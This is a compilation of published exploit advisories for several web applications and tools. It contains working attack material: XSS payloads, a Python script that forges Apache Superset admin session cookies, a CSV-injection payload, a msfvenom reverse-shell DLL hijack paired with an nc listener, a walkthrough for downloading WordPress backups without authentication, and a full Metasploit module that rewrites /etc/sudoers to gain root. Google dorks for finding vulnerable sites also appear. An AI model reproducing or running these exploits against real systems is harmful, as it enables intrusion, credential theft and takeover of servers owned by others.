<pre><code>====================================================================================================================================<br />| # Title : 1Two Ecommerce 1.0 Unauthorized administrative access Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit) | <br />| # Vendor : https://www.1two.org/ | <br />| # Dork : Powered by 1Two Ecommerce 1.0 © |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The control panel is not protected by authentication, so it is possible to act and modify anything.<br /><br />[+] Use payload : /admin/<br /><br />[+] http://127.0.0.1/Ventes/admin/<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code># Exploit Title: e107 v2.3.2 - Reflected XSS<br /># Date: 11/05/2022<br /># Exploit Author: Hubert Wojciechowski<br /># Contact Author: hub.woj12345@gmail.com<br /># Vendor Homepage: https://e107.org/<br /># Software Link: https://e107.org/download<br /># Version: 2.3.2<br /># Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23<br /><br />### XSS Reflected - unauthorized<br /><br />URL: http://127.0.0.1/e107/e107_plugins/tinymce4/plugins/e107/parser.php<br />Parameters: content<br /><br /># POC<br />Request:<br />POST /e107/e107_plugins/tinymce4/plugins/e107/parser.php HTTP/1.1<br />Host: 127.0.0.1<br />Content-Length: 1126<br />sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"<br />Accept: text/html, */*; q=0.01<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />sec-ch-ua-mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36<br />sec-ch-ua-platform: "Windows"<br />Origin: http://127.0.0.1<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: http://127.0.0.1/e107/e107_admin/newspost.php?mode=main&action=edit&id=3<br />Accept-Encoding: gzip, deflate<br />Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7<br />Connection: close<br /><br />content=%5Bhtml%5D%3Cp%3E%3Cstrong%3ELore"/><script>alert(1)</script>bb&mode=tohtml<br /><br />Response:<br />HTTP/1.1 200 OK<br />Date: Thu, 11 May 2023 19:38:45 GMT<br />Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29<br />X-Powered-By: PHP/7.4.29<br />Set-Cookie: PHPSESSID=c4mphnf1igb7lbibn4q1eni10h; expires=Fri, 12-May-2023 19:38:45 GMT; Max-Age=86400; path=/e107/; HttpOnly<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Content-Length: 1053<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br /><!-- bbcode-html-start --><p><strong>Lore"/><script>alert(1)</script>bb<br /><br />### XSS Reflected - Authorized<br /><br />URL: http://127.0.0.1/e107/e107_admin/image.php<br />Parameters: for<br /><br /># POC 1<br />Request:<br />GET /e107/e107_admin/image.php?mode=main&action=dialog&for=_commonh5it1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253edezaw&tagid=media-cat-image&iframe=1&w=206&image=1 HTTP/1.1<br />Host: 127.0.0.1<br />Accept-Encoding: gzip, deflate<br />Accept: */*<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36<br />Connection: close<br /><br />Response:<br />HTTP/1.1 200 OK<br />Date: Thu, 04 May 2023 03:07:35 GMT<br />Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29<br />X-Powered-By: e107<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />ETag: "37f107dbe6a998ecf7b71689627c2a56"<br />Content-Length: 12420<br />Vary: Accept-Encoding<br />X-Frame-Options: SAMEORIGIN<br />Connection: close<br />Content-Type: text/html; charset=utf-8<br /><br /><!doctype html><br /><html lang="en"><br /><head><br /><title>Media Manager - Admin Area :: hacked">bbbbb</title><br /><meta charset='utf-8' /><br /><meta name="viewport" content="width=device-width, initial-scale=0.8, maximum-scale=1" /><br /><!-- *CSS* --><br />[...]<br /><div id="uploader" data-max-size="2mb" rel="/e107/e107_web/js/plupload/upload.php?for=_commonh5it1"><img src=a onerror=alert(1)>dezaw&path="><br /> <p>No HTML5 support.</p><br /> </div><br />[...]<br /><br /># POC 2<br /><br />URL: http://127.0.0.1/e107/e107_admin/newspost.php<br />Parameters: Payload in URL<br /><br />Request:<br />GET /e107/e107_admin/newspost.php/sdd4h"><script>alert(1)</script>kzb89?mode=main&action=list HTTP/1.1<br />Host: 127.0.0.1<br />Cache-Control: max-age=0<br />sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://127.0.0.1/e107/e107_admin/newspost.php?mode=main&action=edit&id=3<br />Accept-Encoding: gzip, deflate<br />Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7<br />Cookie: PHPSESSID=ftq2gnr1kgjqhfa3u902thraa8<br />Connection: close<br /><br />Response:<br /><br /><br /><br /><br />HTTP/1.1 200 OK<br />Date: Fri, 05 May 2023 06:21:53 GMT<br />Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29<br />X-Powered-By: e107<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />ETag: "d127dd6a44a22e093fed60b83bf36af2"<br />Content-Length: 72914<br />Vary: Accept-Encoding<br />X-Frame-Options: SAMEORIGIN<br />Connection: close<br />Content-Type: text/html; charset=utf-8<br /><br /><!doctype html><br /><html lang="en"><br /><head><br /><title>News - List - Admin Area :: hacked">bbbbb</title><br /><meta charset='utf-8' /><br /><meta name="viewport" content="width=device-width, initial-scale=0.8, maximum-scale=1" /><br /><!-- *CSS* --><br />[...]<br /><a class="btn btn-default btn-secondary nextprev-item next " href="http://127.0.0.1/e107/e107_admin/newspost.php/sdd4h"><br /><script>alert(1)</script>kzb89/?mode=main&action=list&from=10" title="Go to the next page" ><i class="fa fa-forward"></i></a><br />[...]<br /><br /></code></pre>
<pre><code># Exploit Title: Apache Superset 2.0.0 - Authentication Bypass<br /># Date: 10 May 2023<br /># Exploit Author: MaanVader<br /># Vendor Homepage: https://superset.apache.org/<br /># Version: Apache Superset<= 2.0.1<br /># Tested on: 2.0.0<br /># CVE: CVE-2023-27524<br /><br />from flask_unsign import session<br />import requests<br />import urllib3<br />import argparse<br />import re<br />from time import sleep<br />from selenium import webdriver<br />from urllib.parse import urlparse<br />urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)<br /><br /><br />SECRET_KEYS = [<br /> b'\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h', # version < 1.4.1<br /> b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET', # version >= 1.4.1<br /> b'thisISaSECRET_1234', # deployment template<br /> b'YOUR_OWN_RANDOM_GENERATED_SECRET_KEY', # documentation<br /> b'TEST_NON_DEV_SECRET' # docker compose<br />]<br /><br />def main():<br /><br /> parser = argparse.ArgumentParser()<br /> parser.add_argument('--url', '-u', help='Base URL of Superset instance', required=True)<br /> parser.add_argument('--id', help='User ID to forge session cookie for, default=1', required=False, default='1')<br /> args = parser.parse_args()<br /><br /> try:<br /> u = args.url.rstrip('/') + '/login/'<br /><br /> headers = {<br /> 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0'<br /> }<br /><br /> resp = requests.get(u, headers=headers, verify=False, timeout=30, allow_redirects=False)<br /> if resp.status_code != 200:<br /> print(f'Error retrieving login page at {u}, status code: {resp.status_code}')<br /> return<br /><br /> session_cookie = None<br /> for c in resp.cookies:<br /> if c.name == 'session':<br /> session_cookie = c.value<br /> break<br /><br /> if not session_cookie:<br /> print('Error: No session cookie found')<br /> return<br /><br /> print(f'Got session cookie: {session_cookie}')<br /><br /> try:<br /> decoded = session.decode(session_cookie)<br /> print(f'Decoded session cookie: {decoded}')<br /> except:<br /> print('Error: Not a Flask session cookie')<br /> return<br /><br /> match = re.search(r'"version_string": "(.*?)&#34', resp.text)<br /> if match:<br /> version = match.group(1)<br /> else:<br /> version = 'Unknown'<br /><br /> print(f'Superset Version: {version}')<br /><br /> <br /> for i, k in enumerate(SECRET_KEYS):<br /> cracked = session.verify(session_cookie, k)<br /> if cracked:<br /> break<br /><br /> if not cracked:<br /> print('Failed to crack session cookie')<br /> return<br /><br /> print(f'Vulnerable to CVE-2023-27524 - Using default SECRET_KEY: {k}')<br /><br /> try:<br /> user_id = int(args.id)<br /> except:<br /> user_id = args.id<br /> <br /> forged_cookie = session.sign({'_user_id': user_id, 'user_id': user_id}, k)<br /> print(f'Forged session cookie for user {user_id}: {forged_cookie}')<br /> u1 = args.url.rstrip('/') + '/superset/welcome'<br /><br /> print(f"Now visit the url: `{u1}` and replace the current session cookie with this `{forged_cookie}` and refresh the page and we will be logged in as admin to the dashboard:)")<br /><br /><br /><br /><br /> except Exception as e:<br /> print(f'Unexpected error: {e}')<br /><br /><br />if __name__ == '__main__':<br /> main()<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Authenticated Persistent XSS in Cameleon CMS 2.7.4<br /># Google Dork: intext:"Camaleon CMS is a free and open-source tool and<br />a fexible content management system (CMS) based on Ruby on Rails"<br /># Date: 2023-10-05<br /># Exploit Author: Yasin Gergin<br /># Vendor Homepage: http://camaleon.tuzitio.com<br /># Software Link: https://github.com/owen2345/camaleon-cms<br /># Version: 2.7.4<br /># Tested on: Linux kali 6.1.0-kali7-amd64<br /># CVE : -<br /><br />--- Description ---<br /><br />http://127.0.0.1:3000/admin/login - Login as a Admin<br /><br />Under Post tab click on "Create New"<br /><br />While creating the post set Title as "><svg/onmouseover=alert(document.cookie)><br /><br />http://127.0.0.1:3000/admin/post_type/2/posts - Post data will be sent<br />to this url<br /><br />-- POST DATA --<br /><br />POST /admin/post_type/2/posts HTTP/1.1<br /><br />Host: 127.0.0.1:3000<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101<br />Firefox/102.0<br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />Referer: http://127.0.0.1:3000/admin/post_type/2/posts/new<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 666<br />Origin: http://127.0.0.1:3000<br />Connection: keep-alive<br />Cookie:<br />_my_project_session=w4yj2Y%2FqHaXYDhwwBDnYsyQUc6AtLUnItJ3MGHBV1yS40xwTgjfvlBZVNgqKIvg1W58e0mxyW4OcBk0XwJRZ90j6SmCHG1KJG9ppBKk%2FdKGDboPCRBq40qKhHnkssRPCgRgIjs69EG7htSdUY%2Bbgit9XTESgvSusBBhsIED%2BLH0VBOBL6H%2FV4Mp59NEP7LhP%2FHmlulEa7I43J8HKpStDj2HiXxA5ZghvSkvpfQpN2d047jLhl71CUcW7pHxmJ4uAdY5ip5OTIhJG9TImps5TbIUrOHyE9vKp1LXzdmbNNi2GI5utUUsURLGUtaN7Fam3Kpi8IqEaBA%3D%3D--8ZKl2%2F6OzLCXn2qA--%2BtMhAwdbdfxNzoSPajkZrg%3D%3D;<br />auth_token=iRDUqXfbhmibLIM5mrHelQ&Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A102.0%29+Gecko%2F20100101+Firefox%2F102.0&127.0.0.1;<br />phpMyAdmin=4f5ad7484490645a49d171c03e15dab2; pma_lang=en<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br /><br />authenticity_token=vuAzhnu6UocDR6zpeeaQxvlVjdmIMr9LPrLEcK5FGVAEYQamLHI1fAG7jBQ3FwEX_ACWedzoX72WAUxqj5wKrQ&post%5Bdraft_id%5D=&post%5Bslug%5D=svgonmouseoveralertdocumentcookie&meta%5Bslug%5D=svgonmouseoveralertdocumentcookie&post%5Btitle%5D=%22%3E%3Csvg%2Fonmouseover%3Dalert%28document.cookie%29%3E&post%5Bcontent%5D=%3Cp%3Eqwe%3C%2Fp%3E&meta%5Bsummary%5D=qwe&options%5Bseo_title%5D=&options%5Bkeywords%5D=&options%5Bseo_description%5D=&options%5Bseo_author%5D=&options%5Bseo_image%5D=&options%5Bseo_canonical%5D=&commit=Create&post%5Bstatus%5D=published&meta%5Btemplate%5D=&meta%5Bhas_comments%5D=0&meta%5Bhas_comments%5D=1&categories%5B%5D=6&tags=&meta%5Bthumb%5D=<br /><br />-- POST DATA --<br /><br />Then view the post you've created by clicking on "View Page" move your<br />mouse cursor onto post title. XSS will popup.<br /><br /><br /></code></pre>
<pre><code>Exploit Title: Prestashop 8.0.4 - CSV injection<br />Application: prestashop<br />Version: 8.0.4<br />Bugs: CSV Injection<br />Technology: PHP<br />Vendor URL: https://prestashop.com/<br />Software Link: https://prestashop.com/prestashop-edition-basic/<br />Date of found: 14.05.2023<br />Author: Mirabbas Ağalarov<br />Tested on: Windows<br /><br /><br />2. Technical Details & POC<br />========================================<br />Step 1. login as user<br />step 2. Go to My Account then information ( http://localhost/index.php?controller=identity )<br />step 3. Set Email as =calc|a!z|@test.com<br />step 3. If admin Export costumers as CSV file ,in The computer of admin occurs csv injection and will open calculator (http://localhost/admin07637b2omxxdbmhikgb/index.php/sell/customers/?_token=mtc1BTvq-Oab2lBdfCaxpOorYraGGVMiTFluJzOpkWI)<br /><br />payload: =calc|a!z|@test.com<br /><br /><br /></code></pre>
<pre><code>*#Exploit Title:* Hubstaff 1.6.14-61e5e22e - 'wow64log' DLL Search Order Hijacking<br />*#Date:* 14/05/2023<br />*#Exploit Author:* Ahsan Azad<br />*#Vendor Homepage:* https://hubstaff.com/<br />*#Software Link:* https://app.hubstaff.com/download<br />*#Version:* 1.6.13, 1.6.14<br />*#Tested On:* 64-bit operating system, x64-based processor<br /><br />*Description*<br />Hubstaff is an employee work tracker with screenshots, timesheets, billing,<br />in-depth reports, and more.<br /><br />During testing. It was found that the system32 subdirectory was missing a<br />DLL library with the name *wow64log.dll* that had been required by the<br />hubstaff's setup file during installation. Hence, using Metasploit's<br />msfvenom to create a new wow64log.dll file, Tester was able to get a<br />reverse shell locally.<br /><br /><br />*Exploit*<br />1- Generate a dll file with the name wow64log.dll using the command:<br /><br />*msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f dll<br />-o wow64log.dll*<br /><br />2- Place the newly generated DLL to the *system32 *directory.<br />3- Start a listener on attacker's console using:<br /><br />*nc -lnvp <port_used_while_generating_DLL>*<br /><br />4- Launch the exe.<br /><br />Reverse shell will be receive as:<br /><br /><br />*C:\Windows>*<br /><br /><br /><br />*Attachments (For the understanding of verification team)*<br />1.png - Showing the wow64.dll was not found by the exe. [image: 1.png]<br /><br />2.png - Showing how tester was able to generate a new dll using msfvenom on<br />port 1337.<br />[image: 2.png]<br /><br />3.png - Showing a reverse connection received on the attacker's console<br />at C:\Windows> by launching the exe.[image: 3.png]<br /><br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin Backup Migration 1.2.8 - Unauthenticated Database Backup<br /># Google Dork: intitle:("Index of /wp-content/plugins/backup-backup") AND inurl:("plugins/backup-backup/")<br /># Date: 2023-05-10<br /># Exploit Author: Wadeek<br /># Vendor Homepage: https://backupbliss.com/<br /># Software Link: https://downloads.wordpress.org/plugin/backup-backup.1.2.8.zip<br /># Version: 1.2.8<br /># Tested on: WordPress 6.2<br /><br />1) Get the version of the plugin.<br /><br />=> GET /wp-content/plugins/backup-backup/readme.txt<br />--------------------------------------------------------------------------<br />Stable tag: 1.2.8<br />--------------------------------------------------------------------------<br /><br />2) Get the name of the backup directory.<br /><br />=> GET /wp-content/backup-migration/config.json<br />--------------------------------------------------------------------------<br />{<br />[...],<br />"STORAGE::LOCAL::PATH":"[...]/wp-content/backup-migration-xXxXxxXxXx",<br />[...],<br />"OTHER:EMAIL":"admin@email.com"<br />}<br />--------------------------------------------------------------------------<br /><br />3) Get the name of the archive containing the backups.<br /><br />=> GET /wp-content/backup-migration/complete_logs.log<br />--------------------------------------------------------------------------<br />BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip<br />--------------------------------------------------------------------------<br /><br />4) Build the path for the download.<br /><br />=> GET /wp-content/backup-migration-xXxXxxXxXx/backups/BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip<br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Local<br /> Rank = ExcellentRanking<br /><br /> include Msf::Post::Linux::Priv<br /> include Msf::Post::Linux::System<br /> include Msf::Post::File<br /> include Msf::Exploit::EXE<br /> include Msf::Exploit::FileDropper<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Sudoedit Extra Arguments Priv Esc',<br /> 'Description' => %q{<br /> This exploit takes advantage of a vulnerability in sudoedit, part of the sudo package.<br /> The sudoedit (aka sudo -e) feature mishandles extra arguments passed in the user-provided<br /> environment variables (SUDO_EDITOR, VISUAL, and EDITOR), allowing a local attacker to<br /> append arbitrary entries to the list of files to process. This can lead to privilege escalation.<br /> by appending extra entries on /etc/sudoers allowing for execution of an arbitrary payload with root<br /> privileges.<br /><br /> Affected versions are 1.8.0 through 1.9.12.p1. However THIS module only works against Ubuntu<br /> 22.04 and 22.10.<br /><br /> This module was tested against sudo 1.9.9-1ubuntu2 on Ubuntu 22.04, and<br /> 1.9.11p3-1ubuntu1 on Ubuntu 22.10.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'h00die', # msf module<br /> 'Matthieu Barjole', # original PoC, analysis<br /> 'Victor Cutillas' # original PoC, analysis<br /> ],<br /> 'Platform' => [ 'linux' ],<br /> 'Arch' => [ ARCH_X86, ARCH_X64 ],<br /> 'SessionTypes' => [ 'shell', 'meterpreter' ],<br /> 'Targets' => [[ 'Auto', {} ]],<br /> 'Privileged' => true,<br /> 'References' => [<br /> [ 'EDB', '51217' ],<br /> [ 'URL', 'https://github.com/M4fiaB0y/CVE-2023-22809/blob/main/exploit.sh' ],<br /> [ 'URL', 'https://raw.githubusercontent.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc/main/exploit.sh' ],<br /> [ 'URL', 'https://www.vicarius.io/vsociety/blog/cve-2023-22809-sudoedit-bypass-analysis' ],<br /> [ 'URL', 'https://medium.com/@dev.nest/how-to-bypass-sudo-exploit-cve-2023-22809-vulnerability-296ef10a1466' ],<br /> [ 'URL', 'https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf' ],<br /> [ 'URL', 'https://www.sudo.ws/security/advisories/sudoedit_any/'],<br /> [ 'CVE', '2023-22809' ]<br /> ],<br /> 'DisclosureDate' => '2023-01-18',<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, CONFIG_CHANGES]<br /> }<br /> )<br /> )<br /> register_advanced_options [<br /> OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),<br /> OptString.new('EDITABLEFILE', [ false, 'A file which can be edited with sudo -e or sudoedit' ]),<br /> OptString.new('SHELL', [ true, 'A shell we can launch our payload from. Bash or SH should be safe', '/bin/sh' ]),<br /> OptInt.new('TIMEOUT', [true, 'The timeout waiting for sudo commands to respond', 10]),<br /> ]<br /> end<br /><br /> def timeout<br /> datastore['TIMEOUT']<br /> end<br /><br /> # Simplify pulling the writable directory variable<br /> def base_dir<br /> datastore['WritableDir'].to_s<br /> end<br /><br /> def get_editable_file<br /> if datastore['EDITABLEFILE'].present?<br /> fail_with(Failure::BadConfig, 'EDITABLEFILE must be a file.') unless file?(datastore['EDITABLEFILE'])<br /><br /> vprint_status("Using user defined EDITABLEFILE: #{datastore['EDITABLEFILE']}")<br /> return datastore['EDITABLEFILE']<br /> end<br /><br /> # we do a rev here to reverse the order since we only want the last entry (the file name), take item 1, then rev it back so its normal. this seemed to<br /> # be the easiest way to do a cut -f -1 (negative one). https://stackoverflow.com/questions/22727107/how-to-find-the-last-field-using-cut<br /> editable_file = cmd_exec('sudo -l -S | grep -E "sudoedit|sudo -e" | grep -E \'\\(root\\)|\\(ALL\\)|\\(ALL : ALL\\)\' | rev | cut -d " " -f 1 | rev')<br /> editable_file = editable_file.strip<br /> if editable_file.nil? || editable_file.empty? || editable_file.include?('a terminal is required to read the password') || editable_file.include?('password for')<br /> return nil<br /> end<br /><br /> return nil unless file?(editable_file)<br /><br /> editable_file<br /> end<br /><br /> def get_sudo_version_from_sudo<br /> package = cmd_exec('sudo --version')<br /> package = package.split(' ')[2] # Sudo version XXX<br /> begin<br /> Rex::Version.new(package)<br /> rescue ArgumentError<br /> # this happens on systems like debian 8.7.1 which doesn't have sudo<br /> Rex::Version.new(0)<br /> end<br /> end<br /><br /> def check<br /> sys_info = get_sysinfo<br /><br /> # Check the app is installed and the version<br /> if sys_info[:distro] == 'ubuntu' || sys_info[:distro] == 'debian'<br /> package = cmd_exec('dpkg -l sudo | grep \'^ii\'')<br /> package = package.split(' ')[2] # ii, package name, version, arch<br /> begin<br /> ver_no = Rex::Version.new(package)<br /> rescue ArgumentError<br /> ver_no = get_sudo_version_from_sudo<br /> end<br /> else<br /> ver_no = get_sudo_version_from_sudo<br /> end<br /><br /> # according to CVE listing, but so much backporting...<br /> minimal_version = '1.8.0'<br /> maximum_version = '1.9.12p1'<br /> exploitable = false<br /><br /> # backporting... so annoying.<br /> # https://ubuntu.com/security/CVE-2023-22809<br /> if sys_info[:distro] == 'ubuntu'<br /> if sys_info[:version].include? '22.10' # kinetic<br /> exploitable = true<br /> maximum_version = '1.9.11p3-1ubuntu1.1'<br /> elsif sys_info[:version].include? '22.04' # jammy<br /> exploitable = true<br /> maximum_version = '1.9.9-1ubuntu2.2'<br /> elsif sys_info[:version].include? '20.04' # focal<br /> maximum_version = '1.8.31-1ubuntu1.4'<br /> elsif sys_info[:version].include? '18.04' # bionic<br /> maximum_version = '1.8.21p2-3ubuntu1.5'<br /> elsif sys_info[:version].include? '16.04' # xenial<br /> maximum_version = '1.8.16-0ubuntu1.10+esm1'<br /> elsif sys_info[:version].include? '14.04' # trusty<br /> maximum_version = '1.8.9p5-1ubuntu1.5+esm7'<br /> end<br /> end<br /><br /> if ver_no == Rex::Version.new(0)<br /> return Exploit::CheckCode::Unknown('Unable to detect sudo version')<br /> end<br /><br /> if ver_no < Rex::Version.new(maximum_version) && ver_no >= Rex::Version.new(minimal_version)<br /> vprint_good("sudo version #{ver_no} is vulnerable")<br /> # check if theres an entry in /etc/sudoers that allows us to edit a file<br /> editable_file = get_editable_file<br /> if editable_file.nil?<br /> if exploitable<br /> return CheckCode::Appears("Sudo #{ver_no} is vulnerable, but unable to determine editable file. Please set EDITABLEFILE option manually")<br /> else<br /> return CheckCode::Appears("Sudo #{ver_no} is vulnerable, but unable to determine editable file. OS can NOT be exploited by this module")<br /> end<br /> elsif exploitable<br /> return CheckCode::Vulnerable("Sudo #{ver_no} is vulnerable, can edit: #{editable_file}")<br /> else<br /> return CheckCode::Vulnerable("Sudo #{ver_no} is vulnerable, can edit: #{editable_file}. OS can NOT be exploited by this module")<br /> end<br /> end<br /><br /> CheckCode::Safe("sudo version #{ver_no} may NOT be vulnerable")<br /> end<br /><br /> def exploit<br /> # Check if we're already root<br /> if !datastore['ForceExploit'] && is_root?<br /> fail_with Failure::None, 'Session already has root privileges. Set ForceExploit to override'<br /> end<br /><br /> if get_editable_file.nil?<br /> fail_with Failure::BadConfig, 'Unable to automatically detect sudo editable file, EDITABLEFILE option is required'<br /> end<br /><br /> # Make sure we can write our exploit and payload to the local system<br /> unless writable?(base_dir) && directory?(base_dir)<br /> fail_with Failure::BadConfig, "#{base_dir} is not writable"<br /> end<br /><br /> sys_info = get_sysinfo<br /><br /> # Check the app is installed and the version<br /> fail_with(Failure::NoTarget, 'Only Ubuntu 22.04 and 22.10 are exploitable by this module') unless sys_info[:distro] == 'ubuntu'<br /> fail_with(Failure::NoTarget, 'Only Ubuntu 22.04 and 22.10 are exploitable by this module') unless sys_info[:version].include?('22.04') || sys_info[:version].include?('22.10')<br /><br /> # Upload payload executable<br /> payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"<br /> upload_and_chmodx payload_path, generate_payload_exe<br /> register_file_for_cleanup(payload_path)<br /><br /> @flag = Rex::Text.rand_text_alphanumeric(12)<br /> print_status 'Adding user to sudoers'<br /> # we tack on a flag so we can easily grep for this line and clean it up later<br /> command = "EDITOR=\"sed -i -e '$ a `whoami` ALL=(ALL:ALL) NOPASSWD: #{datastore['SHELL']} \# #{@flag}' -- /etc/sudoers\" sudo -S -e #{get_editable_file}"<br /> vprint_status("Executing command: #{command}")<br /><br /> output = cmd_exec command, nil, timeout<br /> if output.include? '/etc/sudoers unchanged'<br /> fail_with(Failure::NoTarget, 'Failed to edit sudoers, command was unsuccessful')<br /> end<br /><br /> if output.include? 'sudo: ignoring editor'<br /> fail_with(Failure::NotVulnerable, 'sudo is patched')<br /> end<br /><br /> output.each_line { |line| vprint_status line.chomp }<br /> print_status('Spawning payload')<br /><br /> # -S may not be needed here, but if exploitation didn't go well, we dont want to bork our shell<br /> # also, attempting to thread off of sudo was problematic, solution was<br /> # https://askubuntu.com/questions/1110865/how-can-i-run-detached-command-with-sudo-over-ssh<br /> # other refs that didn't work: https://askubuntu.com/questions/634620/when-using-and-sudo-on-the-first-command-is-the-second-command-run-as-sudo-t<br /> output = cmd_exec "sudo -S -b sh -c 'nohup #{payload_path} > /dev/null 2>&1 &'", nil, timeout<br /> output.each_line { |line| vprint_status line.chomp }<br /> end<br /><br /> def on_new_session(session)<br /> if @flag<br /> session.shell_command_token("sed -i '/\# #{@flag}/d' /etc/sudoers")<br /> flag_found = session.shell_command_token("grep '#{@flag}' /etc/sudoers")<br /> if flag_found.include? @flag<br /> print_bad("Manual cleanup is required, please run: sed -i '/\# #{@flag}/d' /etc/sudoers")<br /> end<br /> end<br /> super<br /> end<br />end<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://www.codester.com/items/5641/ │<br />│ Vendor : WeBiz Digital │<br />│ Software : WBiz Desk 1.2 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Path: /ticket.php<br /><br />GET parameter 'tk' is vulnerable to RXSS<br /><br />http://website/ticket.php?tk=d92h8"><script>alert(1)</script>ygwfb<br /><br /><br />[-] Done<br /></code></pre>
